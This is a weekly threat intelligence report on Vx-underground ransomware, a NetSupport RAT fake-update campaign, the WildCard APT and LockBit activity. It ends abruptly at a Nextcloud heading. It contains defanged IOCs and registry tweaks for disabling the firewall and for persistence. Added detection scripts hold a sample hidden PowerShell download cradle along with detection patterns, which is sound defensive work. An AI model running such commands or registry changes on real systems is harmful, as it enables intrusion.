Weekly Intelligence Report – 01 Dec 2023

Published On : 2023-12-01

Ransomware of the Week

CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. These span multiple industries, geographies, and technologies, and could be relevant to your organization.

Type: Ransomware.
Target Technologies: MS Windows.

Introduction

CYFIRMA Research and Advisory Team has found ransomware known as Vx-underground while monitoring various underground forums as part of our Threat Discovery Process.

Vx-underground:

Researchers have found a ransomware strain called Vx-underground, belonging to the Phobos ransomware family. It’s important to note that this malicious software is distinct from vx-underground, an online repository for malware-related content, such as source code, samples, and research papers.

Phobos, which emerged in 2019, is believed to be a ransomware-as-a-service stemming from the Crysis ransomware family. It achieved widespread distribution through numerous affiliated threat actors in 2023.

During the file encryption process, the malware appends the “.id[unique_id].[staff@vx-underground.org].VXUG” string to the filenames. It’s important to note that the email address “staff@vx-underground.org” is legitimate, and the final extension “VXUG” stands for VX-Underground.

Screenshot of the files encrypted by Vx-underground ransomware (Source: Surface web)

Upon completion, the ransomware generates two ransom notes on the Windows Desktop and in other locations. The initial note, titled ‘Buy Black Mass Volume I.txt,’ playfully references VX by stating that the decryption password isn’t the common “infected,” which is typically used on all VX malware archives.

Text ransom note of Vx-underground ransomware (Source: Surface web)

The second note is an HTA file called ‘Buy Black Mass Volume II.hta.’ It’s a typical Phobos ransom note but customized to incorporate the VX-Underground logo, name, and contact details. The term “Black Mass” refers to books authored by VX-Underground.

Ransomnote by Vx-underground ransomware (Source: Surface web)

The Vx-underground ransomware encrypts both local and network-shared files, avoiding critical system files to prevent system disruption. It excludes files already encrypted by other ransomware, employs a process closure strategy to ensure smooth encryption, and deletes Volume Shadow Copies. The ransomware disables the Firewall. The ransomware ensures persistence by copying itself to %LOCALAPPDATA% and registering with specific Run keys, initiating with every system restart. Additionally, it can extract geolocation data to assess the target’s potential value based on economic and geopolitical factors.

Following are the TTPs based on the MITRE ATT&CK Framework.

Sr. No | Tactics                    | Techniques/Sub-Techniques
1      | TA0002: Execution          | T1047: Windows Management Instrumentation
       |                            | T1053: Scheduled Task/Job
       |                            | T1106: Native API
       |                            | T1129: Shared Modules
2      | TA0003: Persistence        | T1053: Scheduled Task/Job
       |                            | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
       |                            | T1574.010: Hijack Execution Flow: Services File Permissions Weakness
3      | TA0004: Privilege Escalation | T1053: Scheduled Task/Job
       |                            | T1055: Process Injection
       |                            | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
       |                            | T1574.010: Hijack Execution Flow: Services File Permissions Weakness
4      | TA0005: Defense Evasion    | T1036: Masquerading
       |                            | T1055: Process Injection
       |                            | T1202: Indirect Command Execution
       |                            | T1497: Virtualization/Sandbox Evasion
       |                            | T1562.001: Impair Defenses: Disable or Modify Tools
       |                            | T1564.003: Hide Artifacts: Hidden Window
       |                            | T1574.010: Hijack Execution Flow: Services File Permissions Weakness
5      | TA0006: Credential Access  | T1003: OS Credential Dumping
       |                            | T1552.002: Unsecured Credentials: Credentials in Registry
6      | TA0007: Discovery          | T1018: Remote System Discovery
       |                            | T1057: Process Discovery
       |                            | T1082: System Information Discovery
       |                            | T1083: File and Directory Discovery
       |                            | T1497: Virtualization/Sandbox Evasion
       |                            | T1518.001: Software Discovery: Security Software Discovery
7      | TA0009: Collection         | T1005: Data from Local System
       |                            | T1560: Archive Collected Data
8      | TA0011: Command and Control | T1071.001: Application Layer Protocol: Web Protocols
       |                            | T1095: Non-Application Layer Protocol
       |                            | T1105: Ingress Tool Transfer
       |                            | T1571: Non-Standard Port
       |                            | T1573: Encrypted Channel
9      | TA0040: Impact             | T1486: Data Encrypted for Impact


Relevancy and Insights:

  • The ransomware specifically focuses on the extensively used Windows Operating System, which is widespread across a multitude of industries and organizations.
  • Detect-Debug-Environment: Debugging environments are used by developers to analyze and troubleshoot software. Ransomware that can detect debug environments may have implemented techniques to evade or disable debugging tools.
  • Calls to WMI: The ransomware is making calls to the Windows Management Instrumentation (WMI) framework. WMI is a powerful tool used by many legitimate applications and services, but it can also be exploited by malware to evade detection and gain access to sensitive information.
  • By checking the CPU name, the ransomware can gather information about the victim’s computer hardware. This insight can help the attackers determine the system’s compatibility with specific exploit techniques or identify potential vulnerabilities to exploit.
  • Persistence: The ransomware exhibits persistence mechanisms to ensure its survival and ongoing malicious activities within the compromised environment. This could involve creating autostart entries or modifying system settings to maintain a foothold and facilitate future attacks.
  • Ransomware evades network defenses by disabling Windows Firewall, by modifying registry keys like HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall and HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\DoNotAllowExceptions, setting the DWORD values to 0x00000000.
  • Ransomware achieves persistence by adding a malicious executable (AntiRecuvaAndDB in this case) to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. This ensures automatic execution during startup.

ETLM Assessment:

CYFIRMA’s assessment, based on available information about Vx Underground, suggests that as ransomware threats continue to evolve, there is an anticipated increase in focus on sophisticated tactics. This includes leveraging detection evasion mechanisms, persistent strategies, and diverse techniques for reconnaissance and lateral movement. Further integration of anti-analysis capabilities to thwart debugging environments is expected. The use of Windows Management Instrumentation (WMI) for malicious purposes may rise, presenting challenges for detection. Organizations should prioritize robust cybersecurity measures, including behavioral analysis, to counter these advanced threats in the evolving landscape.

Indicators of Compromise

Kindly refer to the IOCs section to exercise controls on your security systems.

Sigma Rule:

title: Suspicious File Creation Activity from Fake Recycle.Bin Folder
tags:
  - attack.persistence
  - attack.defense_evasion
logsource:
  category: file_event
  product: windows
detection:
  selection:
    - Image|contains:
        # e.g. C:\$RECYCLER.BIN
        - 'RECYCLERS.BIN\'
        - 'RECYCLER.BIN\'
        - 'RECYCLE.BIN\'
    - TargetFilename|contains:
        # e.g. C:\$RECYCLER.BIN
        - 'RECYCLERS.BIN\'
        - 'RECYCLER.BIN\'
        - 'RECYCLE.BIN\'
  condition: selection
falsepositives:
  - Unknown
level: high
(Source: Surface web)
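The matching logic of the Sigma rule above, run over a few constructed file-creation events, as an added example that is not part of the original report; the `triage` helper and the `id` field on the events are my own assumptions, not part of the rule.

```python
import re

# Fields and substrings are copied from the Sigma rule above. In Sigma, `contains`
# is case-insensitive, and a selection written as a list is OR-ed across its items.
RULE_TITLE = "Suspicious File Creation Activity from Fake Recycle.Bin Folder"
RULE_FIELDS = ("Image", "TargetFilename")
RULE_SUBSTRINGS = ("RECYCLERS.BIN\\", "RECYCLER.BIN\\", "RECYCLE.BIN\\")

# Assumed triage helper (not part of the rule): the genuine recycle bin sits at the
# root of a volume, e.g. C:\$Recycle.Bin\<SID>\..., and the rule fires on it as well,
# so a hit there deserves a second look before escalation, while a bin-like folder
# anywhere else is the behaviour the rule is really after.
DRIVE_ROOT_BIN_RE = re.compile(r"^[A-Za-z]:\\\$Recycle\.Bin\\", re.IGNORECASE)


def sigma_contains(value, substrings):
    """Sigma `field|contains: [a, b, c]` semantics: any substring, case-insensitive."""
    lowered = value.lower()
    return any(s.lower() in lowered for s in substrings)


def rule_matches(event):
    """`condition: selection`, where selection is a list of two field maps (OR)."""
    return any(sigma_contains(event.get(f, ""), RULE_SUBSTRINGS) for f in RULE_FIELDS)


def triage(event):
    """'drive_root_bin' when every matching path is the real volume-root bin, else 'fake_bin'."""
    hits = [event.get(f, "") for f in RULE_FIELDS
            if sigma_contains(event.get(f, ""), RULE_SUBSTRINGS)]
    if hits and all(DRIVE_ROOT_BIN_RE.match(h) for h in hits):
        return "drive_root_bin"
    return "fake_bin"


def evaluate(events):
    """Return (id, triage verdict) for every event the rule fires on, in input order."""
    return [(e["id"], triage(e)) for e in events if rule_matches(e)]


# Constructed Windows file_event records, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\$RECYCLER.BIN\svchost.exe"},              # look-alike folder
    {"id": 2, "Image": r"C:\Users\alice\AppData\Roaming\RECYCLE.BIN\updater.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\x.dll"},   # hit via Image
    {"id": 3, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\$Recycle.Bin\S-1-5-21-1\$RABC123.docx"},  # real bin
    {"id": 4, "Image": r"C:\Program Files\App\app.exe",
     "TargetFilename": r"C:\ProgramData\App\cache.bin"},              # no match
]

if __name__ == "__main__":
    print(RULE_TITLE)
    for event_id, verdict in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: match ({verdict})")
```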

STRATEGIC RECOMMENDATIONS

  • Implement competent security protocols and encryption, authentication, or access credentials configurations to access critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.

MANAGEMENT RECOMMENDATIONS

  • A data breach prevention plan must be developed considering, (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

TACTICAL RECOMMENDATIONS

  • Update all applications/software regularly with the latest versions and security patches alike.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Add the Sigma rules for threat detection and monitoring which will help to detect anomalies in log events, identify and monitor suspicious activities.

Trending Malware of the Week

Type: Remote Access Trojan (RAT)
Objective: Remote Access, Espionage, Malware Implant
Target Sectors: Education, Government and Business Services
Target Technology: Windows OS

Active Malware of the Week

This week “NetSupport RAT” is trending.

Summary

Threat actors have been misusing legitimate software, specifically NetSupport Manager, as a Remote Access Trojan (RAT) for unauthorized access and attacks. In recent weeks, researchers have identified over 15 new infections associated with NetSupport RAT. The affected sectors include Education, Government, and Business Services, indicating a concerning rise in malicious use within these industries.

NetSupport RAT

NetSupport Manager, originally designed for remote technical support, has been exploited by threat actors as a Remote Access Trojan (RAT) in recent years. The RAT gained prominence in 2020 through a widespread COVID-19 phishing campaign. Its delivery methods include fraudulent updates, drive-by downloads, malware loaders like GhostPulse, and various phishing tactics. Due to its legitimate origins and broad availability, NetSupport Manager is used by multiple threat actors, including TA569 known for SocGholish malware. Its accessibility makes it attractive to a range of attackers, from novices to sophisticated adversaries. Older versions of NetSupport RAT employed .BAT and .VBS files, often as decoys, with only one responsible for executing the RAT and ensuring persistence.

Attack Method

Recent NetSupport RAT attacks involve the trojan being downloaded onto victims’

In this infection scenario, victims are lured into downloading a fake browser update when visiting compromised websites. These sites host a PHP script that convincingly presents a fake update. Clicking on the download link triggers the download of an additional JavaScript payload onto the victim’s endpoint, facilitating the infection. The attack unfolds in distinct stages:

1. Initial Compromise

  • Victim is deceived into downloading a fake browser update from compromised websites.
  • The downloaded payload, named Update_browser_10.6336.js, establishes external network connections to implacavelvideos[.]com.

2. Execution and Payload Handling

  • Update_browser_10.6336.js invokes powershell.exe to execute obfuscated commands.
  • Powershell.exe connects to kgscrew[.]com and passes a Base64 snippet in memory.
  • The Base64 data is then decoded and stored in a file called p.zip.

3. File Extraction and NetSupport Installation

  • Contents of p.zip are extracted into the directory: \appdata\roaming\divx-429\.
  • Decompressed file includes NetSupport dependencies/DLLs and NetSupport Manager.

4. Malicious Capabilities

  • NetSupport, once installed, can monitor behavior, transfer files, manipulate computer settings, and propagate within the network.

5. Persistence

  • Persistence is established by adding client32.exe to the HKCU Run registry key.
  • \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVXX or \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVX
  • PowerShell is used to invoke client32.exe, which connects to the NetSupport RAT Command and Control server at 5[.]252[.]177[.]111(sdjfnvnbbz[.]pw).
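A host-level correlation of the stages above, run over constructed Sysmon-style records, as an added example that is not part of the original report. It also covers the registry-based firewall tampering and Run-key persistence described in the Vx-underground section, and generalizes the firewall check to all firewall profiles; field names follow Sysmon, while the record layout, the AppData heuristic and the finding names are my assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style records, not real telemetry: EventID 1 = process creation,
# 13 = registry value set, 3 = network connection. The URL is kept defanged on purpose.
EVENTS = [
    {"host": "WS01", "EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\bob\Downloads\Update_browser_10.6336.js"'},
    {"host": "WS01", "EventID": 1,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadString('hxxps://gamefllix[.]com/111.php?9279')\""},
    {"host": "WS01", "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1004\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVX",
     "Details": r"C:\Users\bob\AppData\Roaming\divx-429\client32.exe"},
    {"host": "WS01", "EventID": 3,
     "Image": r"C:\Users\bob\AppData\Roaming\divx-429\client32.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"host": "SRV02", "EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters"
                     r"\FirewallPolicy\PublicProfile\EnableFirewall",
     "Details": "DWORD (0x00000000)"},
    {"host": "SRV02", "EventID": 13,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiRecuvaAndDB",
     "Details": r"C:\Users\svc\AppData\Local\AntiRecuvaAndDB.exe"},
    {"host": "WS03", "EventID": 13,  # benign autorun from a non-user-writable path
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\[^\\]+$", re.I)
# The report names PublicProfile; DomainProfile and StandardProfile carry the same values.
FIREWALL_RE = re.compile(r"\\firewallpolicy\\(?:public|domain|standard)profile\\"
                         r"(?:enablefirewall|donotallowexceptions)$", re.I)
FAKE_UPDATE_RE = re.compile(r"update_browser[\w.\-]*\.js", re.I)
DOWNLOAD_CRADLE_RE = re.compile(r"downloadstring|downloadfile|frombase64string|-enc", re.I)
# Heuristic (assumption): autoruns and RAT binaries living under AppData are user-writable
# drop locations; legitimate AppData-resident autoruns need an allowlist in practice.
APPDATA_RE = re.compile(r"\\appdata\\(?:roaming|local)\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_zero_dword(details):
    return re.search(r"0x0+\)?$", details.strip()) is not None


def classify(ev):
    """Yield finding names for one event; an event may produce several."""
    eid = ev.get("EventID")
    if eid == 1:
        cmd, img, parent = ev.get("CommandLine", ""), basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
        if img in SCRIPT_HOSTS and FAKE_UPDATE_RE.search(cmd):
            yield "fake_browser_update_script"            # stage 1: lure payload executed
        if img == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD_CRADLE_RE.search(cmd):
            yield "script_host_spawned_powershell_download"  # stage 2: in-memory fetch
    elif eid == 13:
        key, details = ev.get("TargetObject", ""), ev.get("Details", "")
        if FIREWALL_RE.search(key) and is_zero_dword(details):
            yield "firewall_disabled_via_registry"         # Vx-underground firewall tampering
        if RUN_KEY_RE.search(key) and APPDATA_RE.search(details):
            yield "run_key_autorun_in_appdata"            # stage 5 / Vx-underground persistence
    elif eid == 3:
        img = ev.get("Image", "")
        if basename(img) == "client32.exe" and APPDATA_RE.search(img):
            yield "appdata_client32_outbound"             # NetSupport client beaconing


def analyze(events):
    """Map host -> sorted list of distinct findings; hosts with no findings are omitted."""
    findings = defaultdict(set)
    for ev in events:
        for name in classify(ev):
            findings[ev["host"]].add(name)
    return {host: sorted(names) for host, names in findings.items()}


if __name__ == "__main__":
    for host, names in analyze(EVENTS).items():
        print(f"{host}: {', '.join(names)}")
```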

PowerShell Breakdown

Researchers identified a suspicious PowerShell.exe process with a command line linked to a .JS file named “update_browser_10.6336.js,” confirming it as the NetSupport RAT. Upon examining the command line, a URL was discovered, specifically hxxps[:]//gamefllix[.]com/111.php?9279, which was used to download additional payloads through the DownloadString function in this particular attack.

Reverse Engineering PowerShell

When a compromised endpoint connects to the affected URL, the payload is downloaded. The obtained payload is the GET response of the obfuscated script from the compromised URL (gamefllix[.]com/111[.]php). The script seems to be base64 encoded, prompting researchers to attempt decoding using CyberChef; however, the output remains unreadable. Notably, the PK header at the file’s start indicates a ZIP archive. Some file names, such as CacheMD5.dat, CacheURL.dat, and client32.exe, along with an additional URL, emerge from the CyberChef output.

Researchers then used PowerShell in a secure environment to reconstruct the ZIP archive from the base64 encoded contents of gamefllix[.]com. The reconstructed files, including Client32.ini with GatewayAddress details, revealed that client32.exe established a network connection on port 443 using RADIUSSecret for authentication. NetSupport licensing information extracted from NSM.LIC includes the name HANEYMANEY under the licensee field, associated with threat actor TA569, known for delivering payloads via fake browser updates. While a direct correlation may be uncertain, the observed behavior raises suspicions of a compromised or leaked NetSupport Manager license.

INSIGHTS

  • NetSupport Manager, a tool originally designed for legitimate purposes, has sadly become a favored instrument for cybercriminals, similar to TeamViewer. The NetSupport RAT, once infiltrated, reveals its robust and powerful capabilities, allowing threat actors to cleverly disguise the installation process. Notably, these malicious actors exhibit a high level of adaptability, swiftly updating their strategies to lure victims into installing the harmful remote-control software. This highlights the dynamic and evolving nature of cybersecurity threats.
  • Cybercriminals have been employing diverse strategies to trick individuals into downloading remote access tools, such as NetSupport RAT, with the aim of pilfering information and personal data for financial gain. NetSupport Manager, a potent tool within their arsenal, has been notably used for real-time system monitoring and simultaneous viewing of all connected workstations. This sophisticated remote access tool not only provides detailed system information, including operating system details, computer specifications, and geographic location but also facilitates seamless data and file transfer between connected computers.
  • In recent incidents, threat actors have been exploiting legitimate remote-control tools in their attacks. When infected with such remote-control malware, the compromised system falls under the control of the threat actor, leading to potential damages such as information extortion and the installation of additional malware. The misuse of commonly used remote control tools highlights a concerning trend where threat actors leverage the familiarity of these tools to infiltrate systems discreetly. This underscores the need for heightened awareness and security measures to mitigate the risks associated with the abuse of such tools, emphasizing the importance of securing not only traditional attack vectors but also everyday tools that can be repurposed for malicious intent.

ETLM ASSESSMENT

  • From the ETLM perspective, CYFIRMA anticipates that the strategy employed by cybercriminals, tricking individuals into downloading and installing the NetSupport RAT through deceptive updaters, is likely to persist and evolve. The use of fake Google Chrome, Mozilla Firefox, and other updaters serves as a disguise for malicious activities. In the future, we can anticipate cybercriminals refining these deceptive tactics, potentially expanding to target additional widely used software and applications. This approach not only poses an ongoing threat to individuals but also raises concerns for organizations, as the NetSupport RAT, once installed, can serve as a conduit for various cyber threats. Cybercriminals are likely to continue exploiting legitimate software like NetSupport Manager, capitalizing on its widespread use and user-friendliness to covertly compromise systems. The use of obfuscated scripts, PowerShell commands, and complex multi-stage attacks may become more prevalent, challenging organizations to enhance their threat detection and response capabilities.

Indicators of Compromise

Kindly refer to the IOCs Section to exercise controls on your security systems.

STRATEGIC RECOMMENDATIONS

  • Create a strategy of layering security controls in the organization to make it difficult for adversaries to carry out reconnaissance, exploiting a weakness in the system and potential exfiltration of data.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Configure organization’s intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix.

MANAGEMENT RECOMMENDATIONS

  • Implement real-time website monitoring to analyse network traffic going in and out of the website to detect malicious behaviours.
  • Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviors that lead to a compromise, and are measured against real attacks the organization receives.
  • Security awareness training should be mandated for all company employees. The training should ensure that employees avoid downloading and executing files from unverified sources.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Always listen to the research community and customer feedback when contacted about potential vulnerabilities detected in your infrastructure, or related compliance issues.
  • Employ User and Entity Behavior Analytics (UEBA) in tracking, collecting, and analyzing of user and machine data to detect threats within an organization.

Weekly Intelligence Trends/Advisory

Weekly Attack Type and Trends

Key Intelligence Signals:

  • Attack Type: Malware Implant, Ransomware Attacks, Vulnerabilities & Exploits, DDoS, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Espionage.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
  • Ransomware – LockBit 3.0 Ransomware | Malware – NetSupport RAT
  • LockBit 3.0 Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
  • Malware – NetSupport RAT
  • Behaviour – Most of these malware families use phishing and social engineering techniques as their initial attack vectors. Apart from these techniques, exploitation of vulnerabilities, defence evasion, and persistence tactics are being observed.

Threat Actor in Focus

Unveiling WildCard: Advanced Threat Actor Targeting Critical Sectors in Israel

  • Threat Actors: WildCard
  • Attack Type: Unknown
  • Objective: Espionage
  • Target Technology: Windows
  • Target Geographies: Israel
  • Target Industries: Education, Critical Infrastructure
  • Business Impact: Data Loss, Data exfiltration

Summary:
Recent investigation into the WildCard APT group reveals a sophisticated threat landscape, initially identified through the SysJoker malware targeting Israel’s educational sector in 2021. The group’s expansion into creating intricate malware variants, such as the RustDown written in Rust, indicates a strategic focus on critical sectors within Israel. Despite gaining insights into WildCard’s tactics, their precise identity remains elusive, necessitating further in-depth analysis and collaboration within the information security community.

In October 2023, researchers uncovered RustDown, a new malware attributed to the WildCard APT group. Disguised as a PHP framework component, the 32-bit Windows executable utilizes obfuscation techniques, including encryption and dynamic PowerShell commands, for persistence and evasion. The PDB file path hints at the name “RustDown-Belal,” potentially connecting to a developer named Belal. RustDown exhibits similarities with WildCard’s earlier SysJoker variants, indicating a consistent threat actor. The malware’s complex obfuscation methods involve Base64 decoding and XOR key application. In the communication process with the command-and-control (C2), the WildCard’s RustDown malware employs a dead drop resolver, using a specific OneDrive link. The decoded C2 URL reveals an IP address. RustDown then communicates with the C2 via HTTP, using a format similar to SysJoker. The malware, like its predecessor, decodes the C2 and initiates an initial handshake by sending user information to /api/attach.

Relevancy & Insights:
Amid the Israeli-Hamas conflict, WildCard emerges as a non-traditional threat actor. The SysJoker malware, initially observed in 2021 and publicly disclosed in 2022, lacked attribution to a known actor. However, evidence suggests its involvement in the Israeli-Hamas conflict and a link to the 2016-2017 Electric Powder Operation against Israel Electric Company. The malware’s evolution, shifting from C++ to Rust, indicates a significant rewrite, potentially laying the groundwork for future modifications and enhancements. This campaign was attributed to Gaza Cybergang, a threat actor that is believed to be linked to the Palestinian organization Hamas.

ETLM Assessment:
The APT group, known for serving Hamas-affiliated interests, consistently targets Israeli organizations. However, it seems their activities are not restricted to this focus, as they are looking for possible expansion in their footprints to other geographies. The observed correlation suggests a more extensive strategic agenda that may have repercussions beyond a singular region, potentially influencing the global cyber landscape. Moreover, given the Tactics, techniques, and procedures (TTPs) employed by the group, the prospect of their expansion into new territories is a cause for concern. This underscores the critical need for heightened vigilance and proactive cybersecurity measures on a global scale to anticipate and effectively mitigate potential cyber threats originating from the operations of this group.

Recommendations:

  • Conduct regular training sessions for employees to enhance their awareness of phishing threats and social engineering techniques. Human factors often play a significant role in cyber incidents.
  • Implement and strengthen cybersecurity measures to safeguard against APTs. This includes regularly updating security systems, conducting penetration testing, and ensuring the use of robust antivirus software.
  • Develop and regularly update an incident response plan. This plan should outline clear steps to be taken in case of a security breach, ensuring a swift and effective response.
  • Foster collaboration with other organizations, both within and outside the country, to share threat intelligence and collectively strengthen cybersecurity postures.

Indicators of Compromise

  • Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems.

Major Geopolitical Developments in Cybersecurity

Russian hackers activity puts European power utilities on alert
A recent report on cyber defense of Europe warns of an increased operational tempo of Russian hackers currently underway against critical infrastructure in NATO countries in an echo of similar concern published earlier by CYFIRMA analysts. According to the report, Russia mainly attempts to steal data, paralyse systems critical to the functioning of the state and society, or impersonate state institutions, among other things, in order to sow disinformation or gain access to data. The activity was illustrated by recent activity by the GRU’s (Russian military intelligence) Sandworm APT in response to which European electrical utility executives and government ministers have called for increased vigilance and security against the prospect of Russian cyberattacks against the continent’s power grid. The Energy Ministry of Poland stated it has observed thousands of attacks and probes against the Polish energy grid taking place live coming out of Russia and non-democratic countries allied to Russia further East. According to the statement of the ministry, this anti-Western bloc has created special teams of people working on attacking the democratic states of the European Union via the fifth domain to cause havoc and political discontent. Cyber threats and cyberattacks in the energy sector in the European Union remain the top concern according to the statement.

ETLM Assessment:
The logistics industry and other critical infrastructure like ports, commodity processing hubs, energy infrastructure or communications confront substantial risks from advanced threat actors. Data we have recently published on the logistics industry reveals a consistent pattern of attacks, with a clear emphasis on developed economies and major global logistics hubs. Although true that the detection of APT campaigns has declined, a correlation between the current geopolitical landscape and the most targeted countries remains evident. Moreover, Russia seems to be increasingly employing privateering actors, motivated by financial gains to put distance between Moscow and the potential political fallout. Such a trend is expected to continue as privateers are offered ever more leniency: in the eyes of the Kremlin, the more global instability they help to create, the more attention is deflected from its persecution of Ukraine, with fewer resources available to oppose it.

Iranian hacktivists claim an attack on a U.S. water utilities
A local Municipal Water Authority in Pennsylvania has recently made public that the Iranian hacktivist group known as Cyber Av3ngers had taken control of one of the local water utility’s booster stations. The attack affected a station that monitors and regulates pressure for several small towns in the state. The attack was detected early, and according to authorities neither the safety nor the availability of the townships’ water was affected, with the utility operator switching to manual control. The attackers displayed a message on the station’s monitors expressing their political purpose in broken English: “You have been hacked Down with Israel Every equipment ‘made in Israel’ is Cyber Aveng3rs legal target” (sic). The utility uses a control system provided by Unitronics, an Israeli company.

The same hacktivist collective claimed attacks on utilities before, but those utilities have been located directly in Israel – the attack inside the United States indicates an expansion of the group’s activities.

ETLM Assessment:
As we have warned in our assessments in previous weeks, we are likely to see a spike in the activity of Iranian APTs attacking Israel and other countries that support Israel. These attacks are likely just the beginning with many more to be revealed in due time. So far Israel seems to have been largely successful in blunting state-directed attacks since it employs a proactive cyber defensive approach adopted by the Israeli National Cyber Directorate (INCD), as well as the mobilization of the country’s cyber security ecosystem due to the high-tech nature of the Israeli economy. However, the same cannot be said of every country supporting Israel and the risk of potential spill out is imminent.

The conflict in Gaza has revealed the complex and contradictory forces that shape Iran’s behavior and interests in the Middle East, which are driven by both ideology and pragmatism. Iran’s proxies in the region, namely Lebanese Hezbollah, Iraqi Popular Mobilization Forces and Yemeni Houthis have all joined the struggle and started a low intensity war against Israel and the U.S., mostly by way of rocket and drone attacks.

Hezbollah alone has lost over 50 fighters but the recent speech by its leader Hassan Nasrallah and Iranian supreme leader Ali Khamenei suggest that these attacks are likely meant to show Iran’s strength and deterrence capabilities to Israel and the United States, but also that Iran and its proxies are walking a thin line trying to avoid a direct clash that could harm Iran’s interests and security. Iranian officials have been walking a tightrope between their ideological commitment to the Palestinian cause and their pragmatic calculations of regional interests and risks. Their statements expose the dilemmas and difficulties that Iran confronts in dealing with its friends and foes. But they also reflect their domestic concerns and calculations. This however does not apply to the fifth domain, where the risk of high scale physical retaliation seems low. Israel’s National Cyber Directorate confirms this observation and states that the prospect of an intensified Iranian cyber campaign is deeply worrying, since Iran “knows that they can act there [in cyberspace] more freely than in physical space”.

Rise in Malware/Ransomware and Phishing

Kenso is Impacted by the LockBit 3.0 Ransomware

  • Attack Type: Ransomware
  • Target Industry: Manufacturing and Agriculture
  • Target Geography: Malaysia
  • Ransomware: LockBit 3.0 Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary:
From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in an underground forum that a company from Malaysia, (www[.]kenso[.]com[.]my), was compromised by LockBit 3.0 Ransomware. Kenso is engaged in manufacturing and distributing agrochemicals, fertilisers, and speciality hybrid vegetable seeds. The data, which has been breached, has not yet appeared on the leak site, indicating that negotiations between the affected party and the ransomware group may be underway. The compromised data includes confidential and sensitive information belonging to the organization.

The following screenshot was observed published on the dark web:

Source: Dark Web

Relevancy & Insights:

  • We observe that the Citrix Bleed vulnerability (CVE-2023-4966), CVSS score of 9.4 (Critical), exploited by LockBit 3.0 affiliates, enables threat actors to circumvent password requirements and multifactor authentication (MFA). This leads to the successful hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. By taking control of these sessions, malicious actors gain elevated permissions, allowing them to harvest credentials, move laterally, and access data and resources. However, CISA and the organizations issuing the advisory strongly recommend network administrators to implement mitigations outlined in the Cybersecurity Advisory (CSA). These measures include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.
  • In 2023, the LockBit 3.0 ransomware developed as a global threat, infiltrating numerous public and private organizations worldwide. Notably, the United States has experienced the major impact of this danger, with approximately 30% of the country’s institutions being singled out and subsequently affected by this ransomware.
  • Based on the LockBit 3.0 Ransomware victims list in 2023, the top 5 Target Countries are as follows:

ETLM Assessment:
CYFIRMA assesses that LockBit 3.0 Ransomware will continue to pose a global threat to companies worldwide. We notice that LockBit 3.0 Ransomware affiliates are increasingly utilizing product vulnerabilities and exploits to gain initial access, allowing them to move laterally within organizational networks. The recent targeting of Kenso, a manufacturing company based in Malaysia, highlights the global risk posed. The US is their preferred target geography; however, they clearly do not limit their geographical reach.

Vulnerabilities and Exploits

Vulnerability in Nextcloud Server

  • Attack Type: Vulnerabilities & Exploits
